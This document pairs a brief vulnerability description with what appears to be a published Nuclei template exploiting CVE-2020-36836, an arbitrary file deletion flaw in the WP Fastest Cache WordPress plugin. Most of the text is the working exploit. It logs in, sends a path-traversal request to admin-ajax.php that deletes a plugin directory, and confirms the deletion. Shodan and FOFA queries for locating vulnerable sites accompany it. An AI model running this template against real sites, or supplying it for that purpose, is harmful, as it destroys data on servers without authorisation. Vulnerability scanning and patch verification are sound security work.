The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.
PoC代码[已公开]
id: CVE-2020-36836
info:
name: WordPress WP Fastest Cache <= 0.9.0.2 - Authenticated Arbitrary File Deletion
author: melmathari
severity: high
description: |
The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.
remediation: |
Update WP Fastest Cache to version 0.9.0.3 or later to mitigate this vulnerability.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6e699a-775e-4c59-a266-874eab5fa3a6
- https://nvd.nist.gov/vuln/detail/CVE-2020-36836
- https://plugins.trac.wordpress.org/changeset/2342347/wp-fastest-cache
- https://wearetradecraft.com/advisories/tc-2020-0001/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2020-36836
cwe-id: CWE-862
epss-score: 0.22119
epss-percentile: 0.95553
cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
vendor: wpfastestcache
product: wp_fastest_cache
framework: wordpress
shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/"
fofa-query: "body=/wp-content/plugins/wp-fastest-cache/"
publicwww-query: "/wp-content/plugins/wp-fastest-cache/"
tags: cve,cve2020,wordpress,wp-plugin,wp-fastest-cache,auth,intrusive,wpfastestcache,vkev,vuln
variables:
target_path: "languages"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /wp-content/plugins/wp-fastest-cache/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- "status_code == 200"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- 'status_code == 302 || status_code == 200'
- 'contains(header, "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php?path=/../../../wp-content/plugins/wp-fastest-cache/{{target_path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpfc_delete_current_page_cache
matchers:
- type: dsl
dsl:
- "contains_all(body, 'The cache of page has been cleared', 'success')"
- "status_code == 200"
condition: and
- raw:
- |
GET /wp-content/plugins/wp-fastest-cache/{{target_path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- "status_code == 404"
internal: true
# digest: 4a0a0047304502205189a8a85ad36c7a47505740c7ab58ad5f3d32e64a92ec39ef744e35d0519a72022100ad15d14c00d3502fb2d73c11d3bfc32de63c310bf78416e73f7128dcf6496008:922c64590222798bb761d5b6d8e72950